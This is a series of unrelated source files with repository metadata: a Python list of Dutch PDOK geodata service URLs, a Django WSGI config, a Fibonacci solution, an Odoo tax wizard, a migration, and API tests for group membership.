('wfs' , 'Kadastrale Percelen (INSPIRE geharmoniseerd) (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/inspire/cp/wfs?request=GetCapabilities'),
('wms' , 'Kweldervegetatie (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/kweldervegetatie/wms?request=GetCapabilities') ,
('wfs' , 'Kweldervegetatie (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/kweldervegetatie/wfs?request=GetCapabilities') ,
# included in the general WMTS capabilities: Kadastrale kaart (WMTS | PDOK Basis) http://geodata.nationaalgeoregister.nl/wmts/kadastralekaart?VERSION=1.0.0&request=GetCapabilities
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/l
('wms', 'Landelijke fietsroutes (WMS | Open) ','https://geodata.nationaalgeoregister.nl/lfroutes/wms?request=GetCapabilities'),
('wms', 'Lange afstandswandelroutes (WMS | Open) ','https://geodata.nationaalgeoregister.nl/lawroutes/wms?request=GetCapabilities'),
# the aerial photo (luchtfoto) WMTS services live in separate capabilities documents !!! not in the general one
('wms', 'Luchtfoto Beeldmateriaal / PDOK 25 cm Infrarood (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/luchtfoto/infrarood/wms?&request=GetCapabilities'),
('wms', 'Luchtfoto Beeldmateriaal / PDOK 25 cm RGB (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/luchtfoto/rgb/wms?&request=GetCapabilities'),
# remaining aerial photos ("Gesloten"/closed, but not added...)
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/m
('wms', 'Mossel- en oesterhabitats (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/mosselenoesterhabitats/wms?request=GetCapabilities') ,
('wfs', 'Mossel- en oesterhabitats (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/mosselenoesterhabitats/wfs?request=GetCapabilities') ,
('wms', 'Mosselzaad invanginstallaties (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/mosselzaadinvanginstallaties/wms?request=GetCapabilities') ,
('wfs', 'Mosselzaad invanginstallaties (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/mosselzaadinvanginstallaties/wfs?request=GetCapabilities') ,
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/n
('wms', 'NAPinfo (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/napinfo/wms?request=GetCapabilities'),
('wfs', 'NAPinfo (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/napinfo/wfs?request=GetCapabilities'),
('wms', 'Nationaal Hydrologisch Instrumentarium (NHI) (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/nhi/ows?service=wms&request=GetCapabilities'),
('wfs', 'Nationaal Hydrologisch Instrumentarium (NHI) (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/nhi/wfs?request=GetCapabilities'),
('wms', 'Nationale EnergieAtlas informatielagen Kadaster (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/neainfolagenkadaster/wms?request=GetCapabilities'),
('wfs', 'Nationale EnergieAtlas informatielagen Kadaster (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/neainfolagenkadaster/wfs?request=GetCapabilities'),
('wms', 'Nationale Parken (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nationaleparken/wms?SERVICE=WMS&request=GetCapabilities'),
('wfs', 'Nationale Parken (WFS | Open) ','https://geodata.nationaalgeoregister.nl/nationaleparken/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Nationale Streekpaden (WMS | Open) ','https://geodata.nationaalgeoregister.nl/streekpaden/wms?request=GetCapabilities'),
('wms', 'Natura 2000 (WMS | Open) ','https://geodata.nationaalgeoregister.nl/natura2000/wms?&request=getcapabilities'),
('wfs', 'Natura 2000 (WFS | Open) ','https://geodata.nationaalgeoregister.nl/natura2000/wfs?version=1.0.0&request=GetCapabilities'),
# included in the general WMTS capabilities: Natura 2000 (WMTS | Open) http://geodata.nationaalgeoregister.nl/tiles/service/wmts/natura2000?VERSION=1.0.0&request=GetCapabilities
# no TMS service: Natura 2000 (TMS | Open) http://geodata.nationaalgeoregister.nl/tms/1.0.0/natura2000@EPSG:28992@png8
('wms','Natuurmeting Op Kaart 2010 (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nok2010/wms?service=wms&request=getcapabilities'),
('wfs','Natuurmeting Op Kaart 2011 (WFS | Open) ','https://geodata.nationaalgeoregister.nl/nok2011/wfs?version=1.0.0&request=GetCapabilities'),
# included in the general WMTS capabilities: Natuurmeting Op Kaart 2011 (WMTS | Open) http://geodata.nationaalgeoregister.nl/wmts/nok2011?VERSION=1.0.0&request=GetCapabilities
('wms', 'Natuurmeting Op Kaart 2011 (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nok2011/wms?service=wms&request=getcapabilities'),
# no TMS service: Natuurmeting Op Kaart 2011 (TMS | Open) http://geodata.nationaalgeoregister.nl/tms/1.0.0/nok2011@EPSG:28992@png8
('wms', 'Natuurmeting Op Kaart 2012 (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nok2012/wms?request=GetCapabilities'),
('wfs','Natuurmeting Op Kaart 2012 (WFS | Open) ','https://geodata.nationaalgeoregister.nl/nok2012/wfs?version=1.0.0&request=GetCapabilities'),
('wms','Natuurmeting Op Kaart 2013 (WMS | Open)','https://geodata.nationaalgeoregister.nl/nok2013/wms?request=GetCapabilities'),
('wfs','Natuurmeting Op Kaart 2013 (WFS | Open)','https://geodata.nationaalgeoregister.nl/nok2013/wfs?version=1.0.0&request=GetCapabilities'),
('wms','Natuurmeting Op Kaart 2014 (WMS | Open)','https://geodata.nationaalgeoregister.nl/nok2014/wms?request=GetCapabilities'),
('wfs','Natuurmeting Op Kaart 2014 (WFS | Open)','https://geodata.nationaalgeoregister.nl/nok2014/wfs?version=1.0.0&request=GetCapabilities'),
('wms','Noordzee Vaarwegmarkeringen (WMS | Open)','https://geodata.nationaalgeoregister.nl/noordzeevaarwegmarkeringenrd/wms?service=wms&version=1.0.0&request=getcapabilities'),
('wfs','Noordzee Vaarwegmarkeringen (WFS | Open) ','https://geodata.nationaalgeoregister.nl/noordzeevaarwegmarkeringenrd/wfs?version=1.0.0&request=GetCapabilities'),
('wms','Nulmeting op Kaart 2007 (NOK2007) (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nok2007/wms?service=wms&request=getcapabilities'),
#('wms','Noordzee Wingebieden (WMS | Open)' , 'http://geodata.nationaalgeoregister.nl/noordzeewingebieden/wms?service=wms&version=1.0.0&request=GetCapabilities'),
#('wfs','Noordzee Wingebieden (WFS | Open) ','http://geodata.nationaalgeoregister.nl/noordzeewingebieden/wfs?version=1.0.0&request=GetCapabilities'),
# NWB Spoorwegen dropped; replaced by the ProRail Spoorwegen service?
('wfs','NWB-Spoorwegen (WFS | Open) ','https://geodata.nationaalgeoregister.nl/nwbspoorwegen/wfs?version=1.0.0&request=GetCapabilities'),
('wms','NWB-Spoorwegen (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nwbspoorwegen/wms?SERVICE=WMS&request=GetCapabilities'),
#
('wfs','NWB-Vaarwegen (WFS | Open) ','https://geodata.nationaalgeoregister.nl/nwbvaarwegen/wfs?version=1.0.0&request=GetCapabilities'),
('wms','NWB-Vaarwegen (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nwbvaarwegen/wms?SERVICE=WMS&request=GetCapabilities'),
('wfs','NWB-Wegen (WFS | Open) ','https://geodata.nationaalgeoregister.nl/nwbwegen/wfs?version=1.0.0&request=GetCapabilities'),
('wms','NWB-Wegen (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nwbwegen/wms?SERVICE=WMS&request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/o
('wms','Oppervlaktewaterlichamen (WMS | Open)','https://geodata.nationaalgeoregister.nl/rwsoppervlaktewaterlichamen/wms?request=GetCapabilities'),
('wfs','Oppervlaktewaterlichamen (WFS | Open)','https://geodata.nationaalgeoregister.nl/rwsoppervlaktewaterlichamen/wfs?request=GetCapabilities'),
('wms','Overheidsdiensten (WMS | Open)','https://geodata.nationaalgeoregister.nl/overheidsdiensten/wms?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/p
('wms', 'Potentiekaart omgevingswarmte (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/omgevingswarmte/wms?request=GetCapabilities'),
('wfs', 'Potentiekaart omgevingswarmte (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/omgevingswarmte/wfs?request=GetCapabilities'),
('wms', 'Potentiekaart reststromen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/reststromen/wms?request=GetCapabilities'),
('wfs', 'Potentiekaart reststromen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/reststromen/wfs?request=GetCapabilities'),
('wms', 'Potentiekaart restwarmte (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/restwarmte/wms?request=GetCapabilities'),
('wfs', 'Potentiekaart restwarmte (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/restwarmte/wfs?request=GetCapabilities'),
('wms', 'Publiekrechtelijke Beperking (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/publiekrechtelijkebeperking/wms?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/r
('wms', 'RDinfo (WMS | Open) ','https://geodata.nationaalgeoregister.nl/rdinfo/wms?service=wms&request=getcapabilities'),
('wfs', 'RDinfo (WFS | Open) ','https://geodata.nationaalgeoregister.nl/rdinfo/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Ruimtelijke plannen (WMS | Open) ','https://geodata.nationaalgeoregister.nl/plu/wms?service=wms&request=getcapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/s
('wms', 'Schelpdierenpercelen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/schelpdierenpercelen/wms?request=GetCapabilities'),
('wfs', 'Schelpdierenpercelen (WFS | Open)','https://geodata.nationaalgeoregister.nl/schelpdierenpercelen/wfs?request=GetCapabilities'),
('wms', 'Schelpdierwater (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/schelpdierwater/wms?request=getcapabilities'),
('wfs', 'Schelpdierwater (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/schelpdierwater/wfs?request=getcapabilities'),
('wms', 'Spoorwegen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/spoorwegen/wms?request=GetCapabilities'),
('wfs', 'Spoorwegen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/spoorwegen/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Stort- en loswallen (WMS | Open)','https://geodata.nationaalgeoregister.nl/stortenloswallen/wms?request=GetCapabilities'),
('wfs', 'Stort- en loswallen (WFS | Open)','https://geodata.nationaalgeoregister.nl/stortenloswallen/wfs?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/t
('wms','TOP1000raster (WMS | Open)','https://geodata.nationaalgeoregister.nl/top1000raster/wms?request=GetCapabilities'),
('wms','TOP100raster (WMS | Open)','https://geodata.nationaalgeoregister.nl/top100raster/wms?request=GetCapabilities'),
# included in the general WMTS capabilities: TOP10NL (WMTS | Open) http://geodata.nationaalgeoregister.nl/wmts/top10nl?VERSION=1.0.0&request=GetCapabilities
# no TMS service: TOP10NL (TMS | Open) http://geodata.nationaalgeoregister.nl/tms/1.0.0/top10nl@EPSG:28992@png8
('wms','TOP10NL (WMS | Open) ','https://geodata.nationaalgeoregister.nl/top10nlv2/wms?request=GetCapabilities'),
# included in the general WMTS capabilities: TOP250raster (WMTS | Open) http://geodata.nationaalgeoregister.nl/wmts/top250raster?VERSION=1.0.0&request=GetCapabilities
# no TMS service: TOP250raster (TMS | Open) http://geodata.nationaalgeoregister.nl/tms/1.0.0/top250raster@EPSG:28992@png8
('wms', 'TOP250raster (WMS | Open) ','https://geodata.nationaalgeoregister.nl/top250raster/wms?&Request=getcapabilities'),
#included in the general WMTS capabilities: Top25raster (WMTS | Open) http://geodata.nationaalgeoregister.nl/wmts/top25raster?VERSION=1.0.0&request=GetCapabilities
('wms','TOP25raster (WMS | Open)','https://geodata.nationaalgeoregister.nl/top25raster/wms?request=GetCapabilities'),
# included in the general WMTS capabilities: TOP50raster (WMTS | Open) http://geodata.nationaalgeoregister.nl/wmts/top50raster?VERSION=1.0.0&request=GetCapabilities
('wms', 'TOP500raster (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/top500raster/wms?request=GetCapabilities'),
# no TMS service: TOP50raster (TMS | Open) http://geodata.nationaalgeoregister.nl/tms/1.0.0/top50raster@EPSG:28992@png8
('wms', 'TOP50raster (WMS | Open) ','https://geodata.nationaalgeoregister.nl/top50raster/wms?&Request=getcapabilities'),
# included in the general WMTS capabilities: TOP50vector (WMTS | Open) http://geodata.nationaalgeoregister.nl/wmts/top50vector?VERSION=1.0.0&request=GetCapabilities
# no TMS service: TOP50vector (TMS | Open) http://geodata.nationaalgeoregister.nl/tms/1.0.0/top50vector@EPSG:28992@png8
#('wms', 'TOP50vector (WMS | Open) ','https://geodata.nationaalgeoregister.nl/top50vector/wms?&Request=getcapabilities'),
('wms', 'Transport Netwerken - Kabelbanen (INSPIRE geharmoniseerd) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/inspire/tn-c/wms?&request=GetCapabilities'),
('wfs', 'Transport Netwerken - Kabelbanen (INSPIRE geharmoniseerd) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/inspire/tn-c/wfs?&request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/v
('wms', 'Vaarweg Informatie Nederland (VIN) (WMS | Open) ','https://geodata.nationaalgeoregister.nl/vin/wms?SERVICE=WMS&request=GetCapabilities'),
('wfs', 'Vaarweg Informatie Nederland (VIN) (WFS | Open) ','https://geodata.nationaalgeoregister.nl/vin/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Verkeersscheidingsstelsel (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/verkeersscheidingsstelsel/wms?request=getcapabilities'),
('wfs', 'Verkeersscheidingsstelsel (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/verkeersscheidingsstelsel/wfs?request=getcapabilities'),
('wms', 'Verspreidingsgebied habitattypen (WMS | Open)','https://geodata.nationaalgeoregister.nl/habitatrichtlijnverspreidinghabitattypen/wms?request=GetCapabilities'),
('wfs', 'Verspreidingsgebied habitattypen (WFS | Open)','https://geodata.nationaalgeoregister.nl/habitatrichtlijnverspreidinghabitattypen/wfs?request=GetCapabilities'),
('wms', 'Vervoersnetwerken - Waterwegen (INSPIRE geharmoniseerd) (WMS | Open)', 'http://geodata.nationaalgeoregister.nl/inspire/tn-w/wms?&request=GetCapabilities'),
('wfs', 'Vervoersnetwerken - Waterwegen (INSPIRE geharmoniseerd) (WFS | Open)', 'http://geodata.nationaalgeoregister.nl/inspire/tn-w/wfs?&request=GetCapabilities'),
('wms', 'Vogelrichtlijn verspreiding van soorten (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/vogelrichtlijnverspreidingsoorten/wms?request=GetCapabilities'),
('wfs', 'Vogelrichtlijn verspreiding van soorten (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/vogelrichtlijnverspreidingsoorten/wfs?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/w
('wms', 'Waterschappen Administratieve eenheden INSPIRE (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wsaeenhedeninspire/wms?request=GetCapabilities'),
('wms', 'Waterschappen Hydrografie INSPIRE (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wshydrografieinspire/wms?request=GetCapabilities'),
('wms', 'Waterschappen Kunstwerken IMWA (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wskunstwerkenimwa/wms?request=GetCapabilities'),
('wms', 'Waterschappen Nuts-Overheidsdiensten INSPIRE (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wsdiensteninspire/wms?request=GetCapabilities'),
('wms', 'Waterschappen Oppervlaktewateren IMWA (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wsaoppervlaktewaterenimwa/wms?request=GetCapabilities'),
('wms', 'Waterschappen Waterbeheergebieden IMWA (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wswaterbeheergebiedenimwa/wms?request=GetCapabilities'),
('wms', 'Weggegevens (Weggeg) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/weggeg/wms?SERVICE=WMS&request=GetCapabilities'),
('wfs', 'Weggegevens (Weggeg) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/weggeg/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Wetlands (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wetlands/ows?service=wms&request=getcapabilities'),
('wfs', 'Wetlands (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/wetlands/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Windsnelheden 100m hoogte (WMS | Open)','https://geodata.nationaalgeoregister.nl/windkaart/wms?request=GetCapabilities'),
('wfs', 'Windsnelheden 100m hoogte (WFS | Open)','https://geodata.nationaalgeoregister.nl/windkaart/wfs?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/z
('wms', 'Zeegraskartering (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/zeegraskartering/wms?request=GetCapabilities'),
('wfs', 'Zeegraskartering (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/zeegraskartering/wfs?request=GetCapabilities'),
]
# testing override: note the leading underscore, so this short list is never used by the loop below
_services = [
('wfs', 'Administratieve Eenheden (INSPIRE geharmoniseerd) (WFS | Open)','https://geodata.nationaalgeoregister.nl/inspire/au/wfs?&request=GetCapabilities&service=WFS'),
]
firstOne = True
print('{"services":[', end=' ')
for (stype, title, url) in services:
#print '\n --> %s'%url
if stype == 'wms':
handleWMS(url)
elif stype == 'wmts':
handleWMTS(url)
elif stype == 'wfs':
handleWFS(url)
elif stype == 'wcs':
handleWCS(url)
print(']}')
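# --------------------------------------------------------------------------
# Illustrative sketch only (not part of the original script): one way a
# capabilities handler such as handleWFS() above could be implemented,
# assuming the `owslib` package is available. The function name, the
# version parameter and the emitted JSON shape are assumptions.
def handleWFS_sketch(url):
    from owslib.wfs import WebFeatureService
    wfs = WebFeatureService(url, version='1.0.0')
    # Emit one JSON fragment per layer advertised in the capabilities document.
    for layer_name in wfs.contents:
        print('{"type": "wfs", "title": "%s", "url": "%s", "layer": "%s"},'
              % (wfs.identification.title, url, layer_name))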
|
[
"[email protected]"
] | |
dc9eb9176a34b44ab604ad897356666d4d12c447
|
2a0865c583a12c66fdd1e7a62535b3e35482d37b
|
/CarAI/joshua_work/old/tutorial/Code/04_code/Shaders/src/main.py
|
33201b106c05887838ee512d0fd001dcefad566b
|
[] |
no_license
|
MyAusweis/UnrealAI
|
fe4a6df2859143cd4ca66a063016fc4d22d62bb7
|
9e5ad6b93df7ecf2293de10d41f09969c42404b3
|
refs/heads/master
| 2022-02-11T12:43:52.129313 | 2018-07-01T22:08:23 | 2018-07-01T22:08:23 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 109 |
py
|
from Application import Application
if __name__ == "__main__":
gameApp = Application()
gameApp.run()
|
[
"[email protected]"
] | |
6021a14840f4dfe5737a0e4cca506c1db90ac4e9
|
d721258b53f0f44b1010cb8e8efac8e2a5c96c26
|
/eamon/wsgi.py
|
b12308914222d44e2f8c86e1c45d9fd3a9fb0f6b
|
[
"LicenseRef-scancode-proprietary-license",
"MIT"
] |
permissive
|
kdechant/eamon
|
a6662285f51a6cad5797bb9be92ca709ae36921c
|
080a43aa80c3a1605c402e68616545a8e9c7975c
|
refs/heads/master
| 2023-05-24T08:20:18.551604 | 2022-08-14T10:27:01 | 2023-04-08T07:31:45 | 49,559,304 | 28 | 7 |
MIT
| 2023-03-14T21:09:55 | 2016-01-13T08:07:28 |
TypeScript
|
UTF-8
|
Python
| false | false | 561 |
py
|
"""
WSGI config for the eamon project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
import time
import traceback
import signal
import sys
from django.core.wsgi import get_wsgi_application
sys.path.append('/var/www/vhosts/eamon')
sys.path.append('/var/www/vhosts/eamon/venv/lib/python3.5/site-packages')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "eamon.settings")
application = get_wsgi_application()
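# Typical invocation (an assumption, not documented in this file): point a
# WSGI server at the module-level callable, e.g. `gunicorn eamon.wsgi:application`.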
|
[
"[email protected]"
] | |
ab9d65909b79eb706fa5cf8aaf2e9c7dcf02f382
|
036a41c913b3a4e7ae265e22a672dd89302d3200
|
/LOCF_剑指Offer/Offer10I/Offer10I_Python_1.py
|
766252643cf67ffa677bc1c16c41cc875a9d4433
|
[] |
no_license
|
ChangxingJiang/LeetCode
|
e76f96ebda68d7ade53575354479cfc33ad4f627
|
a2209206cdd7229dd33e416f611e71a984a8dd9e
|
refs/heads/master
| 2023-04-13T15:23:35.174390 | 2021-04-24T05:54:14 | 2021-04-24T05:54:14 | 272,088,506 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 344 |
py
|
class Solution:
def fib(self, n: int) -> int:
if n == 0:
return 0
if n == 1:
return 1
a = 0
b = 1
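        # n - 1 iterations leave fib(n) in b. Python integers are arbitrary
        # precision, so reducing modulo 1000000007 only once at the end is
        # safe; in a fixed-width language the modulus would be taken inside
        # the loop instead.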
for _ in range(n - 1):
a, b = b, a + b
return b % 1000000007
if __name__ == "__main__":
print(Solution().fib(2)) # 1
print(Solution().fib(5)) # 5
|
[
"[email protected]"
] | |
dcbf41f5c810985b668d17f1de7878308645db71
|
0644c03cc3f89b0fc22d9e548a2d06e6a594f1b4
|
/l10n_th_account_pit/wizard/print_wht_cert_wizard.py
|
a526a3939af6f823385ad6781a822ab337ec3e31
|
[] |
no_license
|
phongyanon/pb2_addons
|
552fbf4cd904c81a1fd0ac5817dc1cf8f3377096
|
4c69002eeda2de8e806c8a168d8ba9f28527c8d2
|
refs/heads/master
| 2021-01-19T13:20:53.749866 | 2017-12-20T11:12:51 | 2017-12-20T11:12:51 | 97,184,424 | 0 | 0 | null | 2017-07-14T02:29:53 | 2017-07-14T02:29:52 | null |
UTF-8
|
Python
| false | false | 1,638 |
py
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api
class PrintWhtCertWizard(models.TransientModel):
_inherit = 'print.wht.cert.wizard'
@api.model
def _prepare_wht_line(self, voucher):
wht_lines = []
if self._context.get('pit_withhold', False):
for line in voucher.pit_line:
vals = {
'pit_id': line.id,
'wht_cert_income_type': line.wht_cert_income_type,
'wht_cert_income_desc': line.wht_cert_income_desc,
'base': line.amount_income,
'amount': line.amount_wht,
}
wht_lines.append((0, 0, vals))
else:
wht_lines = super(PrintWhtCertWizard,
self)._prepare_wht_line(voucher)
return wht_lines
@api.model
def _save_selection(self):
if self._context.get('pit_withhold', False):
if not self.voucher_id.income_tax_form:
self.voucher_id.income_tax_form = self.income_tax_form
self.voucher_id.tax_payer = self.tax_payer
for line in self.wht_line:
line.pit_id.write({
'wht_cert_income_type': line.wht_cert_income_type,
'wht_cert_income_desc': line.wht_cert_income_desc,
})
else:
super(PrintWhtCertWizard, self)._save_selection()
class WhtCertTaxLine(models.TransientModel):
_inherit = 'wht.cert.tax.line'
pit_id = fields.Many2one(
'personal.income.tax',
string='PIT Line',
readonly=True,
)
|
[
"[email protected]"
] | |
dbd41fc82545780aec01e119160e4bf1141ad632
|
7fb95b0e0fbc9af63d002e8f589ec464f11b2dcf
|
/mozy/apps/mosaic/migrations/0005_auto_20150502_1437.py
|
6e631a504f97df9ac28d2b5626e3d8a4e2368147
|
[
"MIT"
] |
permissive
|
pipermerriam/mozy
|
2907656de8a724abb1f635235ba8d572cdc1a2c9
|
472d3dc77519aae8abd719819f07a929cfd53641
|
refs/heads/master
| 2023-08-28T09:41:43.696557 | 2015-05-03T10:39:46 | 2015-05-03T10:39:46 | 33,761,997 | 0 | 0 | null | 2015-04-23T18:40:44 | 2015-04-11T04:04:59 |
Python
|
UTF-8
|
Python
| false | false | 633 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mosaic', '0004_auto_20150502_1351'),
]
operations = [
migrations.RemoveField(
model_name='normalizedsourceimage',
name='tile_size',
),
migrations.AlterField(
model_name='mosaicimage',
name='tile_size',
field=models.PositiveSmallIntegerField(default=40, choices=[(20, b'20 pixels'), (40, b'40 pixels'), (60, b'60 pixels'), (80, b'80 pixels')]),
),
]
|
[
"[email protected]"
] | |
f2a1af90f8f17139a5a61568bb00db96f91ff840
|
b3aba10f1d40bf5dc2fd2bc86d7c8d17c02ad214
|
/Python/InterfaceFolder/Interface.py
|
c96c5d964afabbf13d46c5cc5caeb7ad9978552d
|
[] |
no_license
|
jjdblast/BigData
|
2259d8dd6dc774e85c34c9fcb8ef845b099f0dbb
|
442d330da61d3a1cd14a63421a345c1b0b0bd64a
|
refs/heads/master
| 2020-12-31T05:10:05.291026 | 2016-07-28T09:47:01 | 2016-07-28T09:47:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 184 |
py
|
#coding:utf-8
'''
Created on June 2, 2016
@author: giant
'''
def my_callback(input):
print "hellow world"
print "function my_callback was called with %s input" % (input,)
|
[
"[email protected]"
] | |
1b42675fbf142b3e48ac2775be3f1aff0ce1c4fd
|
154ec3de1efcf3c97d154ac2ed0c7cd1c9a25040
|
/tests/functional/api/groups/test_members.py
|
90e089513d00899657c073b57cee6c7a522d376d
|
[
"BSD-3-Clause",
"BSD-2-Clause-Views",
"BSD-2-Clause"
] |
permissive
|
Manuelinux/kubeh
|
98a9c5c0a98be67c3583dd222bd74046cd5ee484
|
a549f0d1c09619843290f9b78bce7668ed90853a
|
refs/heads/master
| 2023-03-16T00:51:43.318292 | 2021-09-17T03:33:14 | 2021-09-17T03:33:14 | 211,371,455 | 0 | 0 |
BSD-2-Clause
| 2023-03-03T07:20:50 | 2019-09-27T17:37:10 |
Python
|
UTF-8
|
Python
| false | false | 8,769 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import pytest
import base64
from h.models.auth_client import GrantType
native_str = str
class TestReadMembers:
def test_it_returns_list_of_members_for_restricted_group_without_authn(
self, app, factories, db_session
):
group = factories.RestrictedGroup()
group.members = [factories.User(), factories.User(), factories.User()]
db_session.commit()
res = app.get("/api/groups/{pubid}/members".format(pubid=group.pubid))
assert res.status_code == 200
assert len(res.json) == 3
def test_it_returns_list_of_members_if_user_has_access_to_private_group(
self, app, factories, db_session, group, user_with_token, token_auth_header
):
user, _ = user_with_token
group.members.append(user)
db_session.commit()
res = app.get(
"/api/groups/{pubid}/members".format(pubid=group.pubid),
headers=token_auth_header,
)
returned_usernames = [member["username"] for member in res.json]
assert user.username in returned_usernames
assert group.creator.username in returned_usernames
assert res.status_code == 200
def test_it_returns_404_if_user_does_not_have_read_access_to_group(
self, app, group, user_with_token, token_auth_header
):
# This user is not a member of the group
user, _ = user_with_token
res = app.get(
"/api/groups/{pubid}/members".format(pubid=group.pubid),
headers=token_auth_header,
expect_errors=True,
)
assert res.status_code == 404
def test_it_returns_empty_list_if_no_members_in_group(self, app):
res = app.get("/api/groups/__world__/members")
assert res.json == []
class TestAddMember:
def test_it_returns_http_204_when_successful(
self, app, third_party_user, third_party_group, auth_client_header
):
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=third_party_group.pubid, userid=third_party_user.userid
),
headers=auth_client_header,
)
assert res.status_code == 204
def test_it_adds_member_to_group(
self, app, third_party_user, third_party_group, auth_client_header
):
app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=third_party_group.pubid, userid=third_party_user.userid
),
headers=auth_client_header,
)
assert third_party_user in third_party_group.members
def test_it_ignores_forwarded_user_header(
self,
app,
third_party_user,
factories,
third_party_group,
db_session,
auth_client_header,
):
headers = auth_client_header
user2 = factories.User(authority="thirdparty.com")
db_session.commit()
headers[native_str("X-Forwarded-User")] = native_str(third_party_user.userid)
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=third_party_group.pubid, userid=third_party_user.userid
),
headers=auth_client_header,
)
assert third_party_user in third_party_group.members
assert user2 not in third_party_group.members
assert res.status_code == 204
def test_it_is_idempotent(
self, app, third_party_user, third_party_group, auth_client_header
):
app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=third_party_group.pubid, userid=third_party_user.userid
),
headers=auth_client_header,
)
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=third_party_group.pubid, userid=third_party_user.userid
),
headers=auth_client_header,
)
assert third_party_user in third_party_group.members
assert res.status_code == 204
def test_it_returns_404_if_authority_mismatch_on_user(
self, app, factories, group, auth_client_header
):
user = factories.User(authority="somewhere-else.org")
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=group.pubid, userid=user.userid
),
headers=auth_client_header,
expect_errors=True,
)
assert res.status_code == 404
def test_it_returns_404_if_malformed_userid(
self, app, factories, group, auth_client_header
):
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=group.pubid, userid="[email protected]"
),
headers=auth_client_header,
expect_errors=True,
)
assert res.status_code == 404
def test_it_returns_404_if_authority_mismatch_on_group(
self, app, factories, user, auth_client_header
):
group = factories.Group(authority="somewhere-else.org")
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=group.pubid, userid=user.userid
),
